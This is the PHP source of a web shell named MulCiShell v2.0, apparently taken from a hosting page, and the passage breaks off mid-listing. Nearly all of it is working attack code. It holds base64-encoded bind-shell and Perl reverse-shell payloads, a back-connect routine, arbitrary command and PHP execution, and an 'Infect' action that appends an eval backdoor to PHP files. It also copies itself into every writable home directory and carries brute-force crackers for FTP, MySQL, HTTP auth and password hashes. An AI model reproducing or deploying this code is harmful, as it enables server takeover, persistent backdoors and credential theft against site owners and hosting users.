Issuu on Google+

<?php #/\/\/\/\/\ MulCiShell v2.0 /\/\/\/\/\/\/\# # Updates from version 1.0# # 1) Fixed MySQL insert function # 2) Fixed trailing dirs # 3) Fixed file-editing when set to 777 # 4) Removed mail function (who needs it?) # 5) Re-wrote & improved interface # 6) Added actions to entire directories # 7) Added config+forum finder # 8) Added MySQL dump function # 9) Added DB+table creation, DB drop, table delete, and column+table count # 10) Updated security-info feature to include more useful details # 11) _Greatly_ Improved file browsing and handling # 12) Added banner # 13) Added DB-Parser and locator # 14) Added enumeration function # 15) Added common functions for bypassing security restrictions # 16) Added bindshell & backconnect (needs testing) # 17) Improved command execution (alts) #/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/# @ini_set("memory_limit","256M"); @set_magic_quotes_runtime(0); session_start(); ob_start(); $start=microtime(); if(isset($_GET['theme'])) $_SESSION['theme']=$_GET['theme']; //Thanks korupt ;) $backdoor_c="DQojaW5jbHVkZSA8YXNtL2lvY3Rscy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW 5jbHVkZSA8c3lzL3NlbGVjdC5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oP g0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4N CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3l zL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN0ZGludC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQuaD4NCg0Kdm9pZC AqQ2xpZW50SGFuZGxlcih2b2lkICpjbGllbnQpDQp7DQoJaW50IGZkID0gKGludCljbGllbnQ7DQoJZHVwM ihmZCwgMCk7DQoJZHVwMihmZCwgMSk7DQoJZHVwMihmZCwgMik7DQoJaWYoZm9yaygpID09IDApDQoJCWV4 ZWNsKCIvYmluL2Jhc2giLCAicmVzbW9uIiwgMCk7DQoJY2xvc2UoZmQpOw0KCXJldHVybiAwOw0KfQ0KDQp pbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KCWludCBtc29jaywgY3NvY2ssIGkgPSAxOw 0KCXB0aHJlYWRfdCB0aHJlYWQ7DQoJc3RydWN0IHNvY2thZGRyIHNhZGRyOw0KCXN0cnVjdCBzb2NrYWRkc l9pbiBzYWRkckluOw0KICAgIGludCBwb3J0PWF0b2koYXJndlsxXSk7DQoJaWYoKG1zb2NrID0gc29ja2V0 KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpID09IC0xKQ0KCQlyZXR1cm4gLTE7DQoNCgl zYWRkckluLnNpbl9mYW1pbHkJCT0gQUZfSU5FVDsNCglzYWRkckluLnNpbl9hZGRyLnNfYWRkcgk9IElOQU REUl9BTlk7DQoJc2FkZHJJbi5zaW5fcG9ydAkJPSBodG9ucyhwb3J0KTsNCiAgIA0KCW1lbWNweSgmc2FkZ HIsICZzYWRkckluLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyX2luKSk7DQoJc2V0c29ja29wdChtc29jaywg U09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAoY2hhciAqKSZpLCBzaXplb2YoaSkpOw0KIA0KCWlmKGJpbmQ obXNvY2ssICZzYWRkciwgc2l6ZW9mKHNhZGRyKSkgIT0gMCl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dX JuIC0xOw0KCX0NCiANCglpZihsaXN0ZW4obXNvY2ssIDEwKSA9PSAtMSl7DQoJCWNsb3NlKG1zb2NrKTsNC gkJcmV0dXJuIC0xOw0KCX0NCiANCgl3aGlsZSgxKXsNCgkJaWYoKGNzb2NrID0gYWNjZXB0KG1zb2NrLCBO VUxMLCBOVUxMKSkgIT0gLTEpew0KCQkJcHRocmVhZF9jcmVhdGUoJnRocmVhZCwgMCwgaGFuZGxlciwgKHZ vaWQgKiljc29jayk7DQoJCX0NCgl9DQoJDQoJcmV0dXJuIDE7DQp9"; $backconnect_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KbXkgKCRpYWRkciwkcG9ydCwk Y21kKT1AQVJHVjsNCm15ICRwYWRkcj1zb2NrYWRkcl9pbigkcG9ydCwgaW5ldF9hdG9uKCRpYWRkcikpOw0 KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0Kc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU0 9DS19TVFJFQU0sICRwcm90byk7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKTsNCm9wZW4oU1RET1VULCI+J lNPQ0tFVCIpOw0Kb3BlbihTVERJTiwiPiZTT0NLRVQiKTsNCnByaW50IFNPQ0tFVCAiU2hlbGwgdGVzdFxu IjsNCnByaW50IGV4ZWMoJGNtZCk7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPVVQpOw0K"; $pl_scan="DQoJIyEvdXNyL2Jpbi9wZXJsDQp1c2Ugd2FybmluZ3M7DQp1c2Ugc3RyaWN0Ow0KdXNlIGRpY Wdub3N0aWNzOw0KdXNlIElPOjpTb2NrZXQ6OklORVQ7DQpzdWIgdXNhZ2UNCnsNCglkaWUoIiQwIGhvc3Qg c3RhcnRwb3J0IGVuZHBvcnQKIik7DQp9DQp1c2FnZSB1bmxlc3MoQEFSR1Y+MSk7DQpteSgkaG9zdCwkcyw kZSk9QEFSR1Y7DQpmb3JlYWNoKCRzLi4kZSkNCnsNCglteSAkc29jaz1JTzo6U29ja2V0OjpJTkVULT5uZX


cNCgkoDQoJCVBlZXJBZGRyPT4kaG9zdCwNCgkJUGVlclBvcnQ9PiRfLA0KCQlQcm90bz0+J3RjcCcsDQoJC VRpbWVvdXQ9PjINCgkpOw0KCXByaW50ICJQb3J0ICBvcGVuCiIgaWYgKCRcc29jayk7DQp9DQoNCgk="; $access_control=0; $md5_user="MulCiber"; $md5_pass="123"; $user_agent="MulCiber"; $allowed_addrs=array('127.0.0.1'); $shell_email="mulciber-@hotmail.com"; $self=basename($_SERVER['PHP_SELF']); $addr=$_SERVER['REMOTE_ADDR']; $serv=@gethostbyname($_SERVER['HTTP_HOST']); $soft=$_SERVER['SERVER_SOFTWARE']; $safe_mode=(@ini_get("safe_mode")=='')?"OFF":"ON"; $open_basedir=(@ini_get("open_basedir")=='')?"OFF":"ON"; $uname=@php_uname(); $space=TrueSize(disk_free_space(realpath(getcwd()))); $total=TrueSize(disk_total_space(realpath(getcwd()))); $id=@execmd("id",$disable); $int_paths=array("mybb","phpbb","phpbb3","forum","forums","board","boards","bb","di scuss"); $inc_paths=array("includes","include","inc"); $sql_build_path; echo "<script type=\"text/javascript\" language=\"javascript\"> function togglecheck() { var cb=document.forms[0].check for (i in cb) { cb[i].checked=(cb[i].checked)?false:true; } } </script>"; switch($access_control) #Break statements intentionally ommited { case 3: $ip_allwd=false; foreach($allowed_addrs as $addr) { if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;} if(!$ip_allwd) exit; } case 2: if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user|| $_SERVER['PHP_AUTH_PW']!=$md5_pass) { header("WWW-Authenticate: Basic Realm=\"Restricted area\""); header("HTTP/1.1 401 Unauthorized"); echo "Wrong username/password"; exit; } case 1: if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit; } if($id) { $s=strpos($id,"(",0)+1; $e=strpos($id,")",$s); $idval=substr($id,$s,$e-$s); }


$disable=@ini_get("disable_functions"); if(empty($disable)) $disable="None"; function rm_rep($dir,&$success,&$fail) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$rm=readdir($dh))) { if($rm=='.' || $rm=='..') continue; if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm...</br>"; rm_rep($dir.'/'.$rm,$success,$fail); continue;} if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...</br>";} else {$fail++; echo "Failed to delete $rm</br>";} } @closedir($dh); } else echo "Failed to open dir $dir</br>"; } function chmod_rep($dir,&$success,&$fail,$mod_value) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$ch=readdir($dh))) { if($ch=='.' || $ch=='..') continue; if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/ $ch...</br>"; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;} if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode for $ch...</br>";} else {$fail++; echo "Failed to chmod $rm</br>";} } @closedir($dh); } else echo "Failed to open dir $dir</br>"; } #Complete these functions function spread_self($user,&$c=0,$d=0) { if(!$d) $dir="/home/$user/public_html/"; else $dir=$d; if(is_dir($dir)&&is_writable($dir)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir. $f.'/mshell.php'); echo "[+] Shell copied to $dir.$f./mshell.php</br>"; $c++; } if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir</br>"; while((@$f=readdir($dh))) { if($f!="."&&$f!="..") { if(@is_dir($dir.$f)) { echo "[+] Spreading to dir $dir</br>"; if(@is_writable($dir.$f)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php');


echo "[+] Shell copied to $dir.$f./mshell.php</br>"; $c++; } $c+=spread_self($user,$c,$dir.$f.'/'); }

}

} } function copy_rep($dir,&$c) { } function backup_site() { if(!isset($_POST['busite'])) { echo "<center>The following tool will attempt to retrieve every file from the specified dir (including child dirs).</br>If successful, you will be prompted for a site backup download.</br><i>Note: Only readable files will be downloaded. Images and executables will be discarded. This tool should only be used in scenarios in which you have to quickly retrieve a site's source.</i></center>"; } } function infect_rep($dir,&$success,&$fail) { } function copy_dir($dir,$new_dir) { } ################################## function execmd($cmd,$d_functions="None") { if($d_functions=="None") {$ret=passthru($cmd); return $ret;} $funcs=array("shell_exec","exec","passthru","system","popen","proc_open"); $d_functions=str_replace(" ","",$d_functions); $dis_funcs=explode(",",$d_functions); foreach($funcs as $safe) { if(!in_array($safe,$dis_funcs)) { if($safe=="exec") { $ret=@exec($cmd); $ret=join("\n",$ret); return $ret; } elseif($safe=="system") { $ret=@system($cmd); return $ret; } elseif($safe=="passthru") { $ret=@passthru($cmd); return $ret; } elseif($safe=="shell_exec") { $ret=@shell_exec($cmd);


return $ret; } elseif($safe=="popen") { $ret=@popen("$cmd",'r'); if(is_resource($ret)) { while(@!feof($ret)) $read.=@fgets($ret); @pclose($ret); return $read; } return -1; } elseif($safe="proc_open") { $cmdpipe=array( 0=>array('pipe','r'), 1=>array('pipe','w') ); $resource=@proc_open($cmd,$cmdpipe,$pipes); if(@is_resource($resource)) { while(@!feof($pipes[1])) $ret.=@fgets($pipes[1]); @fclose($pipes[1]); @proc_close($resource); return $ret; } return -1; }

} } return -1;

} $links=array("Enumerate"=>"$self?act=enum","Files"=>"$self? act=files","Domains"=>"$self?act=domains","MySQL"=>"$self? act=sql","Encoder"=>"$self?act=encode", "Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf", "Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self? act=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Spread Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill"); echo "<html><head><title>MulCiShell v2.0</title></head>"; switch($_SESSION['theme']) { case 'green': echo "<style> body{color:#66FF00; font-size: 12px; font-family: serif; backgroundcolor: black;} td {border: 1px solid #00FF00; background-color:#001f00; padding: 2px; font-size: 12px; color: #33FF00;} td:hover{background-color: black; color: #33FF00;} input{background-color: black; color: #00FF00; border: 1px solid green;} input:hover{background-color: #006600;} textarea{background-color: black; color: #00FF00; border: 1px solid white;} a {text-decoration: none; color: #66FF00; font-weight: bold;} a:hover {color: #00FF00;}


select{background-color: black; color: #00FF00;} #main{border-bottom: 1px solid #33FF00; padding: 5px; text-align: center;}

#main a{padding-right: 15px; color:#00CC00; font-size: 12px; fontfamily: arial; text-decoration: none; } #main a:hover{color: #00FF00; text-decoration: underline;} #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;} </style> <body>"; break; case 'dark': echo "<style> body{color: #FFFFFF; font-size: 12px; font-family: serif; backgroundcolor: #000000;} td {border: 1px solid #FFFFFF; background-color: #000000; padding: 2px; font-size: 12px; color: #FFFFFF;} input{background-color: black; color: #FFFFFF;; border: 1px solid #FFFFFF;} input:hover{background-color: #000099;} textarea{background-color: #000000; color: #FFFFFF; border: 1px solid white;} a {text-decoration: none; color: #FFFFFF; font-weight: bold;} a:hover {font-weight: bold;} select{background-color: #000000; color: #FFFFFF;} #main{border-bottom: 1px solid white; padding: 5px; text-align: center;} #main a{padding-right: 15px; color:#FFFFFF; font-size: 12px; fontfamily: arial; text-decoration: none; } #main a:hover{font-weight: bold;} #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;} </style><body>"; break; default: echo "<style> body{color: white; font-size: 12px; font-family: arial; scrollbar-basecolor:blue; scrollbar-arrow-color:yellow; scrollbar-face-color:blue; } td {border: 1px solid #000099; background-color: #000033; padding: 2px; font-size: 12px; color: white; } input{background-color: black; color: white; border: 1px solid #000066;} input:hover{background-color: #000066; border: 1px solid white;} td:hover {color: yellow; background: black;} textarea{background-color: #000033; color: white; border: 1px solid white;} a {text-decoration: none; color: white; font-weight: bold;} a:hover {color: yellow} select{background-color: black; color: white;} #main{border-bottom: 1px solid #0066FF; padding: 5px; text-align: center;} #main a{padding-right: 15px; color: white; font-size: 12px; fontfamily: arial; text-decoration: none; } #main a:hover{color: #0033FF; text-decoration: underline;} #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}


</style> <body bgcolor='black'>"; break;

} echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5 LzExNjYv bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg=="); echo "<table style='width: inherit; margin: auto; text-align: center;'> <tr><td>Server IP</td><td>Your IP</td><td>Disk space</td><td>Safe_mode? </td><td>Open_BaseDir?</td><td>System</td><td>Server software</td><td>Disabled functions</td><td>ID</td><td>Shell location</td></tr> <tr><td>$serv</td><td>$addr</td><td>$space of $total</td><td>$safe_mode</td><td>$open_basedir</td><td>$uname</td><td>$soft</td><t d>$disable</td><td>$idval</td><td>".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_S ELF'])."</td></tr> </table></br> <div id='main'>"; foreach($links as $val=>$addr) echo "<a href='$addr'>[ $val ]</a>"; echo "</div><br>"; if(isset($_POST['encryption'])) { $e=$_POST['encrypt']; echo "<form action='$self?' method='post'><center><textarea rows='19' cols='75' readonly>MD5: ".md5($e)."\nSHA1: ".sha1($e)."\nCrypt: ".crypt($e)."\nCRC32: ".crc32($e)."\nBase64 Encoded: ".base64_encode($e)."\nBase64 decoded: ".base64_decode($e)."\nURL encode: ".urlencode($e)."\nURL decode: ".urldecode($e)."\nBin2Hex ".bin2hex($e)."\nDec2Hex: ".dechex($e)."</textarea><br><br>Input: <input type='text' style='width: 300px' name='encrypt'> <br><input type='submit' value='Encrypt' name='encryption'></center>"; } if(isset($_POST['dogetfile'])) execmd("wget $_POST[wgetfile]",$disable); if(isset($_POST['doUpload'])) { $dir=$_POST['u_location']; $name=$_FILES['u_file']['name']; switch($_FILES['u_file']['error']) { case 0: if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name)) echo "File uploaded successfully<br>"; else echo "Failed to upload file!"; } } if(isset($_POST['massfiles'])) { $fail=0; $success=0; switch($_POST['fileaction']) { case 'Infect': #Nothing special here, just kick them while they're down foreach($_POST['files'] as $file) { $ext=strrchr($file,'.'); if($ext!=".php") continue; @$fh=fopen($file,'a'); if(@is_resource($fh))


{

$success++; @fwrite($fh,"<?php @eval(\$_GET['e']) ?>"); @fclose($fh); } else $fail++;

} echo "Successfully infected $success files; failed to infect $fail files</br>Exploit files as such: file.php?e=php code"; break; case 'Delete': foreach($_POST['files'] as $file) { if(is_dir($file)) rm_rep($file,$success,$fail); else { if(@unlink(CleanDir($file))) { echo "File $file deleted<br>"; $success++; } else { echo "Failed to delete file $file<br>"; $fail++; } } } echo "Total files deleted: $success; failed to delete $fail files<br>"; break; case 'Chmod': foreach($_POST['files'] as $file) { if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']); if(@chmod(CleanDir($file),$_POST['cmodv'])) { echo "Changed mode for $file<br>"; $success++; } else { echo "Failed to change mode for $file<br>"; $fail++; } } echo "Total files modes modified: $success; failed to chmod $fail files<br>"; break; } } if(isset($_POST['docrack'])) { $con=true; $show=0; $list=@fopen($_FILES['wordlist']['tmp_name'],'r'); if(is_resource($list)) { if(isset($_POST['ftpcrack'])) { echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...</br>";


if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port']; else $port='3306'; if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/", $_POST['ftp_timeout'])) $time=3; else $time=$_POST['ftp_timeout']; @$ftp=ftp_connect($_POST['ftp_host'],$port,$time); if(!$ftp) $con=false; if($con) { $show++; while(!feof($list)) { @$pass=fgets($list); if(ftp_login($ftp,$_POST['ftp_user'],trim($pass))) { echo "Password found! Password for $_POST[ftp_user] is $pass<br>"; @ftp_close($ftp); break; } if($show==10000){echo "Trying pass $pass...</br>"; $show=0;} } } else echo "Failed to connect!</br>"; } elseif(isset($_POST['remote_login'])) { //if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled."); /* $ch=curl_init($_POST['remote_login_target']); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,''); curl_exec($ch); */ if(preg_match("/^http:\/\/+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL."); $path=explode('/',$_POST['remote_login_target']); $site=$path[0]; for($i=1;$i<count($path);$i++) $full_path.='/'.$path[$i]; } elseif(isset($_POST['vbcrack'])) { if(empty($_POST['vbhash']) OR empty($_POST['vbsalt'])) die("Please specify a hash and salt"); while(!feof($list)) { $show++; $pass=trim(fgets($list)); $vbenc=md5(md5($pass).$_POST['vbsalt']); if($vbenc===$_POST['vbhash']) { echo "Password for $_POST[vbhash] found! is $pass</br>"; break; } if($show===10000)


{

$show=0; echo "Trying pass $pass...</br>";

} } echo "Complete</br>";

} elseif(isset($_POST['mysqlcrack'])) { $host=$_POST['mysql_host']; $user=$_POST['mysql_user']; if(!empty($_POST['mysql_port'])) $host.=":$_POST[mysql_port]"; while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(@mysql_connect($host,$user,$pass)) { echo "Password found! Password for $user is

$pass</br>";

break; } if($show==10000) { echo "Trying $pass...</br>"; $show=0; continue; } } } elseif(isset($_POST['authcrack'])) { $arr=explode('/',$_POST['auth_url']); $con_url=$arr[0]; if(empty($_POST['auth_url'])) die("Enter a target first..."); for($i=1;$i<count($arr);$i++) $path.='/'.$arr[$i]; if(preg_match("/^http:\/\/+/",$_POST['auth_url'])) die("Do not include http:// in the url"); while(!feof($list)) { if(is_resource($conn_url=fsockopen($con_url,80,$errno, $errstr,5))) { $show++; $pass=trim(fgets($list)); if($show>5000) {$show=0; echo $pass;} $encode=base64_encode(trim($_POST['auth_user']).':'. $pass); $header="GET $path HTTP/1.1\r\n"; $header.="Host: $con_url\r\n"; $header.="Authorization: Basic $encode\r\n"; $header.="Connection: Close\r\n\r\n"; fputs($conn_url,$header,strlen($header)); $tmp++; while(!feof($conn_url)) { $tmp=fgets($conn_url); if(preg_match("/HTTP\/\d+\.\d+ 200+/",$tmp)) {


echo "Password found!

Password=$pass</br></br>"; } }

break 2;

}

} echo "Done</br>"; } elseif(isset($_POST['md5crack'])) { if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one ;)"); $md5=trim($_POST['md5hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(md5($pass)===$md5) { echo "Password found! Plaintext for $md5 is $pass</br>"; break; } if($show==10000) { echo "Trying $pass...</br>"; $show=0; continue; } } } elseif(isset($_POST['sha1crack'])) { if(empty($_POST['sha1hash'])) die("Enter a hash before attempting to crack one ;)"); $sha1=trim($_POST['sha1hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(sha1($pass)===$sha1) { echo "Password found! Plaintext for $sha1 is $pass</br>"; break; } if($show==10000) { echo "Trying $pass...</br>"; $show=0; continue; } } } } @fclose($list); } if(isset($_POST['port_scan'])) { switch($_POST['type'])


{

case 'php': extract($_POST); while($sport<=$eport) { echo "Trying port $sport"; if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open</br>"; $sport++; } break; default: echo "Invalid request</br>"; } } if(isset($_POST['find_forums'])) { echo "<center><b>[ Forum locator ]</b></center></br></br>"; $found=0; global $int_paths; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html"; if(@is_dir($path)) { foreach($int_paths as $forum_path) { $full_path=$path."/$forum_path/"; if(@is_dir($full_path)) { echo "[+] Forum found: Path: $full_path</br>"; $found++; continue; } } } } echo "Scan complete. Found $found forums</br></br>"; } function find_configs($path,&$found) { if(@file_exists($path.'config.php')) { echo "Found config file: $path"."config.php</br>"; $found++; } @$dh=opendir($path); while((@$file=readdir($dh))) if(is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/', $found); @closedir($dh); } if(isset($_POST['find_configs'])) { $found=0; echo "<center><b>[ Config locator ]</b></center></br></br>"; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!");


while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html/"; find_configs($path,$found); } @fclose($fp); echo "Scan complete. Found $found configs</br></br>"; } if(isset($_POST['execmd'])) {echo "<center><textarea rows='10' cols='100'>"; echo execmd($_POST['cmd'],$disable); echo "</textarea></center>";} if(isset($_POST['execphp'])) {echo "<center><textarea rows='10' cols='100'>"; echo eval(stripslashes($_POST['phpcode'])); echo "</textarea></center>";} if(isset($_POST['cnewfile'])) { if(@fopen($_POST['newfile'],'w')) echo "File created<br>"; else echo "Failed to create file<br>"; } if(isset($_POST['cnewdir'])) { if(@mkdir($_POST['newdir'])) echo "Directory created<br>"; else echo "Failed to create directory<br>"; } if(isset($_POST['doeditfile'])) FileEditor(); switch($_GET['act']) { case 'backc': if(!isset($_POST['backconnip'])) { echo "<center><form action='$self?act=backc' method='post'> Address: <input type='text' value='$_SERVER[REMOTE_ADDR]' name='backconnip'> Port: <input type='text' value='1337' name='backconnport'> <input type='submit' value='Connect'></br></br> Listen with netcat by executing 'nc -l -n -v -p 1337'</br></br> <b>Note: Be sure to foward your port first</b> </form></center>"; } else { if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Specify a host/port"); if(is_writable(".")) { @$fh=fopen(getcwd()."/bc.pl",'w'); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...</br>"; execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnport]",$disable); if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FF0000'>Warning: Failed to delete reverse-connection program</font></br>"; } else { @$fh=fopen("/tmp/bc.pl","w"); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...</br>";


if(!@unlink("/tmp/bc.pl")) echo "<font color='#FF0000'><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>"; } } break; case 'dbs': database_tools(); break; case 'sql': SQLLogin(); break; case 'sqledit': SQLEditor(); break; case 'download': SQLDownload(); break; case 'tools': show_tools(); break; case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from MySQL.<br>"; break; case 'f': FileEditor(); break; case 'encode':Encoder(); break; case 'bypass':security_bypass(); break; case 'bf':brute_force(); break; case 'bh': BackDoor(); break; case 'spread': if(!isset($_POST['spread_shell'])) { echo "<center><form action='?act=spread' method='post'> This tool will attempt to copy the shell into every writable directory on the server, in order to allow access maintaining.</br> Passwd file: <input type='text' value='/etc/passwd' name='passwd_file'></br> <input type='submit' value='Spread' name='spread_shell'> </form></center>"; } else { $s=0; @$file=fopen($_POST['passwd_file'],'r'); if(is_resource($file)) { while(!feof($file)) { @list($user,$x,$uid,$gid,$blank, $home_dir)=explode(":",fgets($file)); spread_self($user,$s); } @fclose($file); } echo ($s>0)?"Spread complete. Successfully managed to spread the shell $s times</br>":"Failed to spread the shell.</br>"; } break; case 'domains': $header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0\r\n"; $header.="Host: searchy.protecus.de\r\n"; $header.="Connection: Close\r\n\r\n"; $domain_handle=fsockopen("searchy.protecus.de",80); @fputs($domain_handle,$header,strlen($header)); while(@!feof($domain_handle)) { echo fgets($domain_handle); } break; case 'kill': if(!isset($_POST['justkill'])) { echo "<center>Do you *really* want to kill the shell?<br><br><form


action='$self?act=kill' method='post'> <input type='submit' value='Yes' name='justkill'></center>"; } else { if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.<br>"; else echo "Failed to delete shell<br>"; } break; case 'sec': $mysql_on=function_exists("mysql_connect")?"ON":"OFF"; $curl_on=function_exists("curl_init")?"ON":"OFF"; $magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF"; $register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON"; $include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled"; $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No"; $ver=phpversion(); echo "<center>Security overview</center><table style='margin: auto;'><tr><td>PHP Version</td><td>Safe mode</td><td>Open_Basedir</td><td>Magic_Quotes</td><td>Register globals</td><td> Remote includes</td><td>Read /etc/passwd?</td><td>MySQL</td><td>cURL</td></tr> <tr><td>$ver</td><td>$safe_mode</td><td>$open_basedir</td><td>$magic_quotes_on</td> <td>$register_globals_on</td><td>$include_on</td> <td>$etc_passwd</td><td>$mysql_on</td><td>$curl_on</td> </tr>"; "</table>"; break; case 'enum': $windows=0; $path=CleanDir(getcwd()); if(!eregi("Linux",php_uname())) {$windows=1;} if(!$windows) { $spath=str_replace("/home/","$serv/~",$path); $spath=str_replace("/public_html/","/",$spath); $URL="http://$spath/".basename($_SERVER['PHP_SELF']); echo "Enumerated shell link: <a href='$URL'>$URL</a>"; } else echo "Enumeration failed<br>"; break; } echo "<br>"; if(isset($_POST['sqlquery'])) { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_POST['db'])) @mysql_select_db($_POST['db']); $post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error()); $affected=@mysql_num_rows($post_query); echo "Affected rows: $affected<br>"; } } $dirs=array(); $files=array(); if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or die("Permission denied!");} else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denied!");}


$current=explode("/",$d); echo "<table style='width: 100%; text-align: center;'><tr><td>Current location: ";for($p=0;$p<count($current);$p++) for($p=0;$p<count($current);$p++) { $cPath.=$current[$p].'/'; echo "<a href=$self?d=$cPath>$current[$p]</a>/"; } echo "</td></tr></table>"; if(isset($_GET['d'])) echo "<form action='$self?d=$_GET[d]' method='post'>"; else echo "<form action='$self?' method='post'>"; echo "<table style='width: 100%'> <tr><td>File</td><td>Size</td><td>Owner/group</td><td>Perms</td><td>Writable</td><t d>Modified</td><td>Action</td></tr>"; while(($f=@readdir($dh))) { if(@is_dir($d.'/'.$f)) $dirs[]=$f; else $files[]=$f; } asort($dirs); asort($files); @closedir($dh); foreach($dirs as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'. $f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'. $f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; $size="DIR"; @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),2); @$write=is_writable($d.'/'.$f)?"Yes":"No"; $mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); if($f==".") {continue;} elseif($f=="..") { $f=Trail($d.'/'.$f); echo "<tr><td><a href='$self? act=files&d=$f'>..</a></td><td>$size</td><td>$own/ $grp</td><td>$ch</td><td>$write</td><td>$mod</td><td>None</td></tr>"; continue; } echo "<tr><td><a href='$self?act=files&d=$d/ $f'>$f</a></td><td>$size</td><td>$own/ $grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>"; } foreach($files as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'. $f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'. $f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; @$size=TrueSize(filesize($d.'/'.$f)); 